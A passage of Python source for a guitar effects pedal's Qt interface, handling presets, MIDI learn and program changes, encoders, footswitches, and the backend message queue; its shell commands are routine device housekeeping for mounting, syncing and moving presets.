/dev/mmcblk0p2 /mnt\"\n ret_var = subprocess.call(command, shell=True)\n shutil.rmtree(\"/mnt/audio/cabs\")\n shutil.rmtree(\"/mnt/audio/reverbs\")\n os.mkdir(\"/mnt/audio/cabs\")\n os.mkdir(\"/mnt/audio/reverbs\")\n os.sync()\n # remount as RO\n command = \"sudo mount -o remount,ro /dev/mmcblk0p2 /mnt\"\n ret_var = subprocess.call(command, shell=True)\n\n @Slot(str)\n def delete_preset(self, in_preset_file):\n preset_file = in_preset_file[len(\"file://\"):]\n debug_print(\"delete: preset_file files is \", preset_file)\n # is always a directory\n # empty / default\n if \".ingen\" not in preset_file or preset_file in [\"/mnt/presets/digit/Default_Preset.ingen\", \"/mnt/presets/beebo/Empty.ingen\", \"/mnt/presets/digit/Empty.ingen\"]:\n return\n # delete\n try: # if it doesn't exist, we still want to remove it from the preset list and meta cache\n shutil.rmtree(preset_file)\n except:\n pass\n # remove from set list.\n preset_list = preset_list_model.stringList()\n debug_print(\"preset list is\", preset_list)\n if in_preset_file in preset_list:\n preset_list = [v for v in preset_list if v != in_preset_file]\n preset_list_model.setStringList(preset_list)\n self.save_preset_list()\n preset_meta_data.pop(preset_file, False)\n write_preset_meta_cache()\n os.sync()\n\n @Slot()\n def save_preset_list(self):\n debug_print(\"saving preset list\")\n with open(\"/mnt/pedal_state/beebo_preset_list.json\", \"w\") as f:\n json.dump(preset_list_model.stringList(), f)\n os.sync()\n preset_list_model.setStringList(preset_list)\n\n\n @Slot(str)\n def set_pedal_author(self, author):\n pedal_state[\"author\"] = author\n write_pedal_state()\n context.setContextProperty(\"pedalState\", pedal_state)\n\n @Slot(int, str)\n def set_current_mode(self, mode, effect_name):\n # debug_print(\"updating UI\")\n global current_patchbay_mode\n global current_selected_effect\n current_patchbay_mode = mode\n current_selected_effect = effect_name\n\n @Slot()\n def get_ip(self):\n ret_obj = subprocess.run(\"hostname -I\", capture_output=True, shell=True)\n current_ip.name = ret_obj.stdout.decode()\n\n @Slot(str, bool)\n def set_broadcast(self, effect_name, is_broadcast):\n # debug_print(x, y, z)\n if (effect_name in current_effects) and (\"broadcast_ports\" in current_effects[effect_name]):\n for parameter in current_effects[effect_name][\"broadcast_ports\"].keys():\n ingen_wrapper.set_broadcast(effect_name+\"/\"+parameter, is_broadcast)\n else:\n debug_print(\"effect not found\", effect_name, effect_name in current_effects)\n\n @Slot(str, str)\n def midi_learn(self, effect_name, parameter):\n # this toggles, if we're already learned, forget. No way to currently cancel waiting for midi\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n if current_effects[effect_name][\"controls\"][parameter].cc > -1:\n # have current, forget\n ingen_wrapper.midi_forget(effect_name+\"/\"+parameter)\n else:\n ingen_wrapper.midi_learn(effect_name+\"/\"+parameter)\n else:\n debug_print(\"effect not found\", effect_name, parameter, value, effect_name in current_effects)\n\n @Slot(result=str)\n def get_midi_assignments(self):\n r = \"MIDI Assignments \\n\"\n for effect_name in current_effects:\n\n effect_display_name = effect_name.rsplit(\"/\", 1)[1].rstrip(\"1\").replace(\"_\", \" \")\n for parameter in current_effects[effect_name][\"controls\"]:\n cc = current_effects[effect_name][\"controls\"][parameter].cc\n parameter_name = current_effects[effect_name][\"controls\"][parameter].name\n if cc > -1:\n r = r + f\"Effect: {effect_display_name} Parameter: {parameter_name} Channel: {(cc >> 8)+1} CC: {cc & 0xFF}\\n\"\n return r\n\n @Slot(str)\n def finish_remove_effect(self, effect_name):\n try:\n current_effects.pop(effect_name) # done after UI removes it\n except:\n pass\n context.setContextProperty(\"currentEffects\", current_effects) # might be slow\n\n @Slot(str, str)\n def expose_spotlight(self, effect_name, parameter):\n # this toggles, if we're already learned, forget. No way to currently cancel waiting for midi\n l_spotlight_entries = [b for b in self.spotlight_entries if b[0:2] == [effect_name, parameter]]\n if l_spotlight_entries != []:\n spotlight_entry = l_spotlight_entries[0]\n # remove it\n spotlight_entries_changed(spotlight_entry[0], spotlight_entry[1], '', spotlight_entry[2])\n ingen_wrapper.spotlight_remove(effect_name+\"/\"+parameter)\n self.spotlight_entries.remove(spotlight_entry)\n else:\n self.spotlight_entries.append([effect_name, parameter, \"1\"])\n if len(self.spotlight_entries) > 10:\n e_r, p_r, p_v = self.spotlight_entries.pop(0)\n spotlight_entries_changed(e_r, p_r, '', p_v)\n ingen_wrapper.spotlight_remove(e_r+\"/\"+p_r)\n ingen_wrapper.spotlight_set(effect_name+\"/\"+parameter, \"1\")\n\n @Slot(str, str, str)\n def toggle_spotlight_binding(self, effect_name, parameter, control):\n # this toggles, control is l, r, x, y\n spotlight_entry = [b for b in self.spotlight_entries if b[0:2] == [effect_name, parameter]]\n if spotlight_entry == []:\n # shouldn't ever happen, spotlight should be bound already\n return\n i = self.spotlight_entries.index(spotlight_entry[0])\n\n current_v = spotlight_entry[0][2]\n prev_v = current_v\n\n\n if control in current_v:\n current_v = current_v.replace(control, \"\")\n else:\n current_v = current_v+control\n print(\"#### current v \", current_v, effect_name, parameter)\n ingen_wrapper.spotlight_set(effect_name+\"/\"+parameter, current_v)\n self.spotlight_entries[i] = [effect_name, parameter, current_v]\n spotlight_entries_changed(effect_name, parameter, current_v, prev_v)\n\ndef spotlight_entries_changed(effect_name, parameter, cur_v, prev_v):\n # online \n # l, r, x, y are stored in a list for easy iteration\n cur_v = cur_v.replace(\"1\", \"\").replace(\"0\", \"\")\n prev_v = prev_v.replace(\"1\", \"\").replace(\"0\", \"\")\n added = set(cur_v) - set(prev_v)\n removed = set(prev_v) - set(cur_v)\n for control in added:\n spotlight_map[control].add((effect_name, parameter))\n for control in removed:\n spotlight_map[control].discard((effect_name, parameter))\n\ndef io_new_effect(effect_name, effect_type, x=20, y=30):\n # called by engine code when new effect is created\n # debug_print(\"from backend new effect\", effect_name, effect_type)\n if effect_type in effect_prototypes:\n current_effects[effect_name] = {\"x\": x, \"y\": y, \"effect_type\": effect_type,\n \"controls\": {},\n }\n\ndef add_io():\n ingen_wrapper.add_midi_input(\"/main/midi_in\", x=1192, y=(80 * 5))\n ingen_wrapper.add_midi_input2(\"/main/loop_midi_out\", x=1192, y=(80 * 6))\n ingen_wrapper.add_midi_output(\"/main/loop_extra_midi\", x=20, y=(80 * 3))\n ingen_wrapper.add_midi_output2(\"/main/midi_out\", x=-20, y=(80 * 5))\n if current_pedal_model.name == \"hector\":\n for i in range(1,7):\n ingen_wrapper.add_input(\"/main/in_\"+str(i), x=1192, y=(80*i))\n for i in range(1,9):\n ingen_wrapper.add_output(\"/main/out_\"+str(i), x=-20, y=(80 * i))\n else:\n for i in range(1,5):\n ingen_wrapper.add_input(\"/main/in_\"+str(i), x=1192, y=(80*i))\n for i in range(1,5):\n ingen_wrapper.add_output(\"/main/out_\"+str(i), x=-20, y=(80 * i))\n ingen_wrapper.add_output(\"/main/loop_common_in_1\", x=1092, y=(80*1))\n ingen_wrapper.add_output(\"/main/loop_common_in_2\", x=1092, y=(80*2))\n ingen_wrapper.add_input(\"/main/loop_common_out_1\", x=20, y=(80*1))\n ingen_wrapper.add_input(\"/main/loop_common_out_2\", x=20, y=(80*2))\n\nclass Encoder():\n # name, min, max, value\n def __init__(self, starteffect=\"\", startparameter=\"\", s_speed=1):\n self.effect = starteffect\n self.parameter = startparameter\n self.speed = s_speed\n self.rmin = 0\n self.rmax = 1\n self.is_loopler = False\n self.is_locked = False\n self.loop_index = -1\n\nknob_map = {\"left\": Encoder(s_speed=0.04), \"right\": Encoder(s_speed=0.8)}\nspotlight_map = {\"l\": set(), \"r\": set(), \"x\": set(), \"y\": set()}\n\ndef handle_encoder_change(is_left, change):\n # debug_print(is_left, change)\n # qDebug(\"encoder change \"+ str(is_left) + str(change))\n # increase or decrease the current knob value depending on knob speed\n # knob_value = knob_value + (change * knob_speed)\n normal_speed = 24.0\n knob = \"left\"\n knob_effect = knob_map[knob].effect\n knob_parameter = knob_map[knob].parameter\n\n # invert if we're running new style encoders\n\n if \"invert_enc\" in pedal_state and pedal_state[\"invert_enc\"]:\n is_left = not is_left\n change = change * -1\n if True: # qa_view:\n if is_left:\n qa_k = \"left\"\n else:\n qa_k = \"right\"\n value = encoder_qa[qa_k].value\n base_speed = 1 / normal_speed\n knob_speed = 5\n value = value + (change * knob_speed * base_speed)\n encoder_qa[qa_k].value = value\n # iterate over this knob in spotlight mapping if it exists\n spotlighted = {}\n if is_left:\n spotlighted = spotlight_map[\"l\"]\n else:\n spotlighted = spotlight_map[\"r\"]\n\n if is_left:\n knob_speed = knob_map[\"left\"].speed\n else:\n knob_speed = knob_map[\"right\"].speed\n # base speed * speed multiplier\n base_speed = (abs(knob_map[knob].rmin) + abs(knob_map[knob].rmax)) / normal_speed\n if len(spotlighted) > 0:\n for knob_effect, knob_parameter in spotlighted:\n value = current_effects[knob_effect][\"controls\"][knob_parameter].value\n value = value + (change * knob_speed * base_speed)\n knobs.ui_knob_change(knob_effect, knob_parameter, value)\n elif current_patchbay_mode == PatchMode.DETAILS:\n if not knob_effect or knob_effect not in current_effects and not knob_map[knob].is_loopler:\n return\n\n if knob_map[knob].is_loopler:\n loopler.change_from_knob(knob_effect, knob_parameter, knob_map[knob].loop_index, change, knob_speed * base_speed, knob_map[knob].rmin, knob_map[knob].rmax)\n else:\n value = current_effects[knob_effect][\"controls\"][knob_parameter].value\n value = value + (change * knob_speed * base_speed)\n\n # debug_print(\"knob value is\", value)\n # knob change handles clamping\n knobs.ui_knob_change(knob_effect, knob_parameter, value)\n\ndef set_bpm(bpm):\n current_bpm.value = bpm\n # host.transport_bpm(bpm)\n # send_ui_message(\"bpm_change\", (bpm, ))\n # debug_print(\"setting tempo\", bpm)\n\n### Assignable actions\n# \n\nActions = Enum(\"Actions\", \"\"\"set_value\nset_value_down\ntap\nset_tempo\ntoggle_pedal\nselect_preset\nnext_preset\nprevious_preset\nnext_action_group previous_action_group\ntoggle_effect\n\"\"\")\nfoot_action_groups = [{\"tap_up\":[Actions.set_value] , \"step_up\": [Actions.set_value], \"bypass_up\":[Actions.set_value],\n \"tap_down\":[Actions.set_value_down] , \"step_down\": [Actions.set_value_down], \"bypass_down\":[Actions.set_value_down],\n \"tap_step_up\": [Actions.set_value], \"step_bypass_up\": [Actions.set_value],\n \"tap_step_down\": [Actions.set_value_down], \"step_bypass_down\": [Actions.set_value_down]}]\n # \"tap_step_up\": [Actions.previous_preset], \"step_bypass_up\": [Actions.next_preset]}]\ncurrent_action_group = 0\n\ndef handle_bypass():\n # global bypass\n pedal_bypassed.value = not pedal_bypassed.value\n if pedal_bypassed.value:\n pedal_hardware.effect_off()\n else:\n pedal_hardware.effect_on()\n\ndef hide_foot_switch_warning():\n foot_switch_warning.value = False\n\ndef looper_footswitch_action(foot_switch_name):\n # command, value, set_all, global value, add loop, remove loop, \n # foot switches store command and arguments\n for action_params in looper_footswitch_assignments[foot_switch_name]:\n # getattr(loopler, \"cancel_midi_learn\")() \n print(\"command is \", action_params[0], \"params\", repr(action_params[1]))\n func = getattr(loopler, action_params[0])\n func(*action_params[1])\n return True\n return False\n\ndef send_to_footswitch_blocks(timestamp, switch_name, value=0):\n # send to all foot switch blocks\n # print(\"sending to switch_name \"+str(switch_name) + \"value\" + str(value))\n if \"tap_step\" in switch_name:\n foot_switch_name = \"foot_switch_d\"\n elif \"step_bypass\" in switch_name:\n foot_switch_name = \"foot_switch_e\"\n elif \"tap\" in switch_name:\n foot_switch_name = \"foot_switch_a\"\n elif \"step\" in switch_name:\n foot_switch_name = \"foot_switch_b\"\n elif \"bypass\" in switch_name:\n foot_switch_name = \"foot_switch_c\"\n\n trimmed_name = foot_switch_name[-1]\n # if we're in hold mode then we're assigning something to a foot switch\n if value == 0 and current_patchbay_mode == PatchMode.HOLD:\n # set this foot swtich to the currently held effect\n if current_selected_effect != \"\":\n if current_effects[current_selected_effect][\"assigned_footswitch\"].value == trimmed_name:\n ingen_wrapper.set_footswitch_control(current_selected_effect, \"\")\n else:\n ingen_wrapper.set_footswitch_control(current_selected_effect, foot_switch_name[-1])\n return\n\n # \n if value == 0 and loopler.current_command_params:\n # remove if currently assigned\n if looper_footswitch_assignments[foot_switch_name[-1]] == [list(loopler.current_command_params)]:\n looper_footswitch_assignments[foot_switch_name[-1]] = []\n ingen_wrapper.set_looper_footswitch(current_sub_graph.rstrip(\"/\"), json.dumps(looper_footswitch_assignments))\n loopler.current_command_params = None\n else:\n looper_footswitch_assignments[foot_switch_name[-1]] = [loopler.current_command_params]\n # show foot switch selection screen, choose if for current loop, all loops, momentary, latching, toggle?\n # exclusive or adds on\n ingen_wrapper.set_looper_footswitch(current_sub_graph.rstrip(\"/\"), json.dumps(looper_footswitch_assignments))\n loopler.current_command_params = None\n return\n\n if True: # qa_view\n foot_switch_qa[foot_switch_name[-1]].value = value\n\n found_effect = False\n bpm = None\n if value == 1:\n bpm = handle_tap(foot_switch_name, timestamp)\n\n # toggle all assigned effects\n if value == 0:\n for effect_id in footswitch_assignments[trimmed_name]:\n enabled = current_effects[effect_id][\"enabled\"].value\n knobs.set_bypass(effect_id, not enabled) # toggle\n found_effect = True\n if looper_footswitch_action(trimmed_name):\n found_effect = True\n\n for effect_id, effect in current_effects.items():\n if \"foot_switch\" in effect[\"effect_type\"]:\n if foot_switch_name in effect_id:\n if bpm is not None:\n # qDebug(\"sending knob change from foot switch \"+effect_id + \"bpm\" + str(float(bpm)))\n knobs.ui_knob_change(effect_id, \"bpm\", float(bpm))\n # qDebug(\"sending knob change from foot switch \"+effect_id + \"value\" + str(float(value)))\n if effect[\"controls\"][\"latching\"].value < 0.9:\n effect[\"controls\"][\"cur_out\"].value = float(value)\n else:\n if value > 0:\n effect[\"controls\"][\"cur_out\"].value = 1.0 - effect[\"controls\"][\"cur_out\"].value\n knobs.ui_knob_change(effect_id, \"value\", float(value))\n found_effect = True\n\n if not found_effect and value == 0:\n if foot_switch_name == \"foot_switch_c\":\n handle_bypass()\n elif foot_switch_name == \"foot_switch_d\":\n if pedal_state[\"d_is_tuner\"] == True:\n toggle_tuner()\n else:\n previous_preset()\n elif foot_switch_name == \"foot_switch_e\":\n next_preset()\n # TODO add next / previous here\n else:\n # show you're pressing a footswitch that isn't connected to anything\n foot_switch_warning.value = True\n QTimer.singleShot(2500, hide_foot_switch_warning)\n\n\ndef next_preset():\n jump_to_preset(True, 1)\n\ndef previous_preset():\n jump_to_preset(True, -1)\n\ndef toggle_tuner():\n\n if is_loading.value == True:\n return\n preset_load_counter.value = preset_load_counter.value + 1\n\n if current_preset_filename == \"/mnt/presets/beebo/Tuner.ingen\":\n # if we've got a previous_preset, jump to it\n if previous_preset_filename != \"\":\n knobs.ui_load_preset_by_name(\"file://\"+previous_preset_filename)\n else:\n knobs.ui_load_preset_by_name(\"file:///mnt/presets/beebo/Tuner.ingen\")\n\ndef handle_foot_change(switch_name, timestamp):\n # debug_print(switch_name, timestamp)\n # qDebug(\"foot change \"+ str(switch_name) + str(timestamp))\n action = foot_action_groups[current_action_group][switch_name][0]\n params = None\n if len(foot_action_groups[current_action_group][switch_name]) > 1:\n params = foot_action_groups[current_action_group][switch_name][1:]\n\n if action is Actions.tap:\n pass\n elif action is Actions.toggle_pedal:\n handle_bypass()\n\n elif action is Actions.set_value:\n send_to_footswitch_blocks(timestamp, switch_name, 0)\n elif action is Actions.set_value_down:\n send_to_footswitch_blocks(timestamp, switch_name, 1)\n elif action is Actions.select_preset:\n pass\n\n elif action is Actions.next_preset:\n next_preset()\n\n elif action is Actions.previous_preset:\n previous_preset()\n\n elif action is Actions.toggle_effect:\n pass\n\nstart_tap_time = {\"foot_switch_a\":None, \"foot_switch_b\":None, \"foot_switch_c\":None, \"foot_switch_d\":None, \"foot_switch_e\":None}\n## tap callback is called by hardware button from the GPIO checking thread\ndef handle_tap(footswitch, timestamp):\n current_tap = timestamp\n bpm = None\n if start_tap_time[footswitch] is not None:\n # just use this and previous to calculate BPM\n # BPM must be in range 30-250\n d = current_tap - start_tap_time[footswitch]\n # 120 bpm, 0.5 seconds per tap\n bpm = 60 / d\n if bpm > 30 and bpm < 350:\n # set host BPM\n pass\n else:\n bpm = None\n\n # record start time\n start_tap_time[footswitch] = current_tap\n return bpm\n\ndef process_ui_messages():\n # pop from queue\n try:\n while not EXIT_PROCESS[0]:\n m = ui_messages.get(block=False)\n # debug_print(\"got ui message\", m)\n if m[0] == \"value_change\":\n # debug_print(\"got value change in process_ui\")\n effect_name_parameter, value = m[1:]\n effect_name, parameter = effect_name_parameter.rsplit(\"/\", 1)\n try:\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n effect_type = current_effects[effect_name][\"effect_type\"]\n # debug_print(\"value set\", value, effect_type, parameter )\n if \"kill_dry\" in effect_prototypes[effect_type] and parameter == \"enabled\":\n # debug_print(\"kill dry value set\", value)\n current_effects[effect_name][\"enabled\"].value = bool(float(value))\n current_effects[effect_name][\"controls\"][parameter].value = float(value)\n except ValueError:\n pass\n\n elif m[0] == \"bpm_change\":\n current_bpm.value = m[1][0]\n elif m[0] == \"set_plugin_state\":\n pass\n # plugin_state[m[1][0]].value = m[1][1]\n elif m[0] == \"add_connection\":\n head, tail = m[1:]\n from_backend_add_connection(head, tail)\n elif m[0] == \"remove_connection\":\n head, tail = m[1:]\n from_backend_disconnect(head, tail)\n elif m[0] == \"add_plugin\":\n effect_name, effect_type, x, y, is_enabled = m[1:6]\n # debug_print(\"got add\", m)\n if (effect_name not in current_effects and (effect_type in inv_effect_type_map or effect_type in bare_ports)):\n # debug_print(\"adding \", m)\n if effect_type == \"http://polyeffects.com/lv2/polyfoot\":\n mapped_type = effect_name.rsplit(\"/\", 1)[1].rstrip(\"123456789\")\n if mapped_type in effect_type_map:\n from_backend_new_effect(effect_name, mapped_type, x, y, is_enabled)\n elif effect_type in bare_ports:\n if current_pedal_model.name == \"hector\":\n from_backend_new_effect(effect_name, effect_type, x, y, is_enabled)\n else:\n try:\n l_effect_num = int(effect_name.rsplit(\"/\", 1)[1][-1])\n except:\n l_effect_num = 0\n if l_effect_num < 5: # filter out Hector ports\n from_backend_new_effect(effect_name, effect_type, x, y, is_enabled)\n else:\n from_backend_new_effect(effect_name, inv_effect_type_map[effect_type], x, y, is_enabled)\n ingen_wrapper.get_state(\"/engine\")\n elif m[0] == \"remove_plugin\":\n effect_name = m[1]\n if (effect_name in current_effects):\n from_backend_remove_effect(effect_name)\n elif m[0] == \"enabled_change\":\n effect_name, is_enabled = m[1:]\n # debug_print(\"enabled changed \", m)\n if (effect_name in current_effects):\n # debug_print(\"adding \", m)\n current_effects[effect_name][\"enabled\"].value = bool(is_enabled)\n elif m[0] == \"pedalboard_loaded\":\n subgraph, file_name = m[1:]\n # disable loading sign\n print (\"pedalboard loaded\", subgraph, file_name, current_sub_graph)\n if subgraph == current_sub_graph.rstrip(\"/\"):\n is_loading.value = False\n done_loading_time = time.perf_counter()\n # check if we've got MIDI IO, if not add them\n print(\"### preset loaded in \", done_loading_time - preset_started_loading_time)\n debug_print(\"checking if MIDI exists\")\n if not (current_sub_graph+\"midi_in\" in current_effects):\n ingen_wrapper.add_midi_input(current_sub_graph+\"midi_in\", x=1192, y=(80 * 5))\n # debug_print(\"adding MIDI\")\n if not (current_sub_graph+\"midi_out\" in current_effects):\n ingen_wrapper.add_midi_output(current_sub_graph+\"midi_out\", x=-20, y=(80 * 5))\n if current_pedal_model.name == \"hector\" and not (current_sub_graph+\"out_5\" in current_effects):\n # add hector IO\n for i in range(5,7):\n ingen_wrapper.add_input(current_sub_graph+\"in_\"+str(i), x=1192, y=(80*i))\n for i in range(5,9):\n ingen_wrapper.add_output(current_sub_graph+\"out_\"+str(i), x=-20, y=(80 * i))\n patch_bay_notify.loading_preset_done.emit(current_sub_graph)\n\n elif m[0] == \"dsp_load\":\n max_load, mean_load, min_load = m[1:]\n dsp_load.rmin = min_load\n dsp_load.rmax = max_load\n dsp_load.value = mean_load + 0.25\n elif m[0] == \"set_comment\":\n description, subject = m[1:]\n preset_description.name = description\n elif m[0] == \"looper_footswitch\":\n footswitch, effect_name = m[1:]\n global looper_footswitch_assignments\n looper_footswitch_assignments = json.loads(footswitch)\n elif m[0] == \"assign_footswitch\":\n footswitch, effect_name = m[1:]\n if effect_name in current_effects:\n current_effects[effect_name][\"assigned_footswitch\"].value = footswitch\n # remove existing assignment if any\n for k in footswitch_assignments.keys():\n footswitch_assignments[k].discard(effect_name)\n if footswitch in footswitch_assignments:\n footswitch_assignments[footswitch].add(effect_name)\n elif m[0] == \"midi_pc\":\n program = m[1]\n jump_to_preset(False, program)\n elif m[0] == \"add_port\":\n pass\n elif m[0] == \"set_file\":\n effect_name, ir_file = m[1:]\n try:\n if (effect_name in current_effects) and (\"ir\" in current_effects[effect_name][\"controls\"]):\n if current_effects[effect_name][\"controls\"][\"ir\"].name != ir_file:\n current_effects[effect_name][\"controls\"][\"ir\"].name = ir_file\n effect_type = current_effects[effect_name][\"effect_type\"]\n if effect_type in [\"mono_reverb\", \"stereo_reverb\", \"quad_ir_reverb\"]:\n # debug_print(\"setting reverb file\", urllib.parse.unquote(ir_file))\n knobs.update_ir(effect_name, urllib.parse.unquote(ir_file))\n elif effect_type in [\"mono_cab\", \"stereo_cab\", \"quad_ir_cab\"]:\n knobs.update_ir(effect_name, urllib.parse.unquote(ir_file))\n elif effect_type in [\"amp_rtneural\", \"amp_nam\"]:\n knobs.update_json(effect_name, urllib.parse.unquote(ir_file))\n # debug_print(\"setting cab file\", urllib.parse.unquote(ir_file))\n # qDebug(\"setting knob file \" + ir_file)\n except ValueError:\n pass\n elif m[0] == \"remove_port\":\n pass\n elif m[0] == \"exit\":\n # global EXIT_PROCESS\n EXIT_PROCESS[0] = True\n elif m[0] == \"broadcast_update\":\n # debug_print(\"got value change in process_ui\")\n effect_name_parameter, value = m[1:]\n effect_name, parameter = effect_name_parameter.rsplit(\"/\", 1)\n\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n effect_type = current_effects[effect_name][\"effect_type\"]\n # debug_print(\"value set\", value, effect_type, parameter )\n if \"kill_dry\" in effect_prototypes[effect_type] and parameter == \"enabled\":\n # debug_print(\"kill dry value set\", value)\n current_effects[effect_name][\"enabled\"].value = bool(float(value))\n current_effects[effect_name][\"controls\"][parameter].value = float(value)\n try:\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"broadcast_ports\"]):\n current_effects[effect_name][\"broadcast_ports\"][parameter].value = float(value)\n # print(\"updated \", effect_name, parameter, value)\n except ValueError:\n pass\n elif m[0] == \"midi_learn\":\n # debug_print(\"got midi_learn in process_ui\")\n effect_name_parameter, value = m[1:]\n effect_name, parameter = effect_name_parameter.rsplit(\"/\", 1)\n try:\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n current_effects[effect_name][\"controls\"][parameter].cc = int(value)\n # print(\"updated \", effect_name, parameter, value)\n except ValueError:\n pass\n elif m[0] == \"spotlight\":\n effect_name_parameter, value = m[1:]\n # debug_print(\"got spotlight in process_ui\", value)\n effect_name, parameter = effect_name_parameter.rsplit(\"/\", 1)\n try:\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n if value != \"0\":\n # we're spotlighted\n if [effect_name, parameter, value] not in knobs.spotlight_entries:\n knobs.spotlight_entries.append([effect_name, parameter, value])\n spotlight_entries_changed(effect_name, parameter, value, '')\n else:\n # remove spotlight if found\n l_spotlight_entries = [b for b in knobs.spotlight_entries if b[0:2] == [effect_name, parameter]]\n if l_spotlight_entries != []:\n spotlight_entry = l_spotlight_entries[0]\n spotlight_entries_changed(spotlight_entry[0], spotlight_entry[1], '', spotlight_entry[2])\n knobs.spotlight_entries.remove(spotlight_entry)\n # print(\"updated \", effect_name, parameter, value)\n except ValueError:\n pass\n except queue.Empty:\n pass\n\n\n\n\neffect_type_map = {}\neffect_prototypes = {}\ninv_effect_type_map = {}\n\n\ndef set_available_effects():\n hidden_effects = [\"mix_vca\"]\n # add list is effect_category:effect_name\n effects = set(effect_type_map.keys()) - set(hidden_effects)\n cat_effects = [[], [], [], []]\n for e in effects:\n cat_effects[effect_prototypes[e][\"category\"]].append(e)\n # print(e)\n # # qDebug(e)\n # if \"category\" not in effect_prototypes[e]:\n # print(e)\n # qDebug(\"MISSING\")\n # qDebug(e)\n # print(e, str(effect_prototypes[e][\"category\"]))\n # cat_effects = sorted([str(effect_prototypes[e][\"category\"])+\":\"+e for e in effects])\n for i, a in enumerate(cat_effects):\n available_effects[i].setStringList(sorted(a))\n # available_effects.setStringList(list(effects))\n\ndef change_pedal_model(name, initial=False):\n _name = \"beebo\" # override\n global inv_effect_type_map\n global effect_type_map\n global effect_prototypes\n effect_type_map = effect_type_maps[_name]\n effect_prototypes = effect_prototypes_models[_name]\n\n set_available_effects()\n # context.setContextProperty(\"effectPrototypes\", effect_prototypes)\n accent_color_models = {\"beebo\": \"#FFA0E0\", \"digit\": \"#FFA0E0\", \"hector\": \"#32D2BE\"}\n accent_color.name = accent_color_models[name]\n\n inv_effect_type_map = {v:k for k, v in effect_type_map.items()}\n current_pedal_model.name = name\n load_preset_list()\n jump_to_preset(False, 0, initial)\n\ndef handle_MIDI_program_change():\n # This is pretty dodgy... but I don't want to depend on jack in the main process as it'll slow down startup\n # we need to wait here for ttymidi to be up\n ttymidi_found = False\n if IS_REMOTE_TEST:\n return\n while not ttymidi_found:\n a = subprocess.run([\"jack_lsp\", \"ttymidi\"], capture_output=True)\n if b\"ttymidi\" in a.stdout:\n ttymidi_found = True\n time.sleep(1)\n p = subprocess.Popen('jack_midi_dump', stdout=subprocess.PIPE)\n # Grab stdout line by line as it becomes available. This will loop until \n time.sleep(2)\n try:\n command = [\"/usr/bin/jack_connect\", \"ttymidi:MIDI_in\", \"midi-monitor:input\"]\n ret_var = subprocess.run(command)\n # check if MIDI thru is needed\n if pedal_state[\"thru\"] == True:\n command = [\"/usr/bin/jack_connect\", \"ttymidi:MIDI_in\", \"ttymidi:MIDI_out\"]\n ret_var = subprocess.run(command)\n except:\n pass\n # p terminates.\n while p.poll() is None:\n l = p.stdout.readline() # This blocks until it receives a newline.\n if len(l) > 8 and l[6] == b'c'[0]:\n b = l.decode()\n ig, b1, b2 = b.split()\n channel = int(\"0x\"+b1, 16) - 0xC0\n program = int(\"0x\"+b2, 16)\n # debug_print(channel, program)\n if channel == midi_channel.value - 1: # our channel\n # put this in the queue\n ui_messages.put((\"midi_pc\", program))\n # When the subprocess terminates there might be unconsumed output \n # that still needs to be processed.\n ignored = p.stdout.read()\n\nif __name__ == \"__main__\":\n\n debug_print(\"in Main\")\n app = QGuiApplication(sys.argv)\n QIcon.setThemeName(\"digit\")\n QFontDatabase.addApplicationFont(\"qml/fonts/BarlowSemiCondensed-SemiBold.ttf\")\n font = QFont(\"BarlowSemiCondensed\", 20, QFont.DemiBold)\n app.setFont(font)\n\n # preset might not have been copied on an update, as file system might not have been supported\n if not os.path.isfile(\"/mnt/presets/beebo/Empty.ingen/main.ttl\") and not IS_REMOTE_TEST:\n # rsync\n command = \"sudo rsync -a /to_nor_flash/ /nor_flash\"\n ret_var = subprocess.call(command, shell=True)\n\n if os.path.isfile(\"/mnt/presets/digit/Empty.ingen/main.ttl\") and not IS_REMOTE_TEST:\n # first time running after merge update\n command = \"mv -f /mnt/presets/digit/* /mnt/presets/beebo/;rm -rf /mnt/presets/digit/*\"\n ret_var = subprocess.call(command, shell=True)\n get_meta_from_files(True)\n\n # Instantiate the Python object.\n knobs = Knobs()\n loopler = loopler_lib.Loopler()\n\n\n # read persistant state\n pedal_state = {}\n load_pedal_state()\n current_bpm = PolyValue(\"BPM\", 120, 30, 250) # bit of a hack\n current_preset = PolyValue(\"Default Preset\", 0, 0, 127)\n preset_load_counter = PolyValue(\"\", 0, 0, 500000)\n current_preset_filename = \"\"\n previous_preset_filename = \"\"\n update_counter = PolyValue(\"\", 0, 0, 500000)\n command_status = [PolyValue(\"\", -1, -10, 100000), PolyValue(\"\", -1, -10, 100000)]\n delay_num_bars = PolyValue(\"Num bars\", 1, 1, 16)\n dsp_load = PolyValue(\"DSP Load\", 0, 0, 0.3)\n foot_switch_qa = {\"a\":PolyValue(\"a\", 0, 0, 1), \"b\":PolyValue(\"b\", 0, 0, 1), \"c\":PolyValue(\"c\", 0, 0, 1), \"d\":PolyValue(\"d\", 0, 0, 1), \"e\":PolyValue(\"e\", 0, 0, 1)}\n encoder_qa = {\"left\":PolyValue(\"a\", 0, 0, 1), \"right\":PolyValue(\"b\", 0, 0, 1)}\n connect_source_port = PolyValue(\"\", 1, 1, 16) # for sharing what type the selected source is\n midi_channel = PolyValue(\"channel\", pedal_state[\"midi_channel\"], 1, 16)\n input_level = PolyValue(\"input level\", pedal_state[\"input_level\"], -80, 10)\n preset_description = PolyValue(\"tap to write description\", 0, 0, 1)\n debug_print(\"### Input level is\", input_level.value)\n knobs.set_input_level(pedal_state[\"input_level\"], write=False)\n pedal_bypassed = PolyBool(False)\n is_loading = PolyBool(False)\n foot_switch_warning = PolyBool(False)\n is_l_to_r = PolyBool(pedal_state[\"l_to_r\"])\n preset_meta_data = {}\n favourites = {}\n load_preset_meta_cache()\n load_favourites_data()\n module_browser_model_s = module_browser_model.ModuleBrowserModel(favourites)\n preset_browser_model_s = preset_browser_model.PresetBrowserModel(preset_meta_data, favourites, pedal_state[\"author\"])\n amp_browser_model_s = amp_browser_model.AmpBrowserModel({\"nam\": [], \"amp\": []}, knobs)\n # ir_browser_model_s = ir_browser_model.irBrowserModel({\"reverbs\": [], \"cabs\": []}, knobs)\n\n patch_bay_notify = PatchBayNotify()\n\n available_effects = [QStringListModel() for i in range(4)]\n set_available_effects()\n qmlRegisterType(ir_browser_model.irBrowserModel, \"ir_browser_module\", 1, 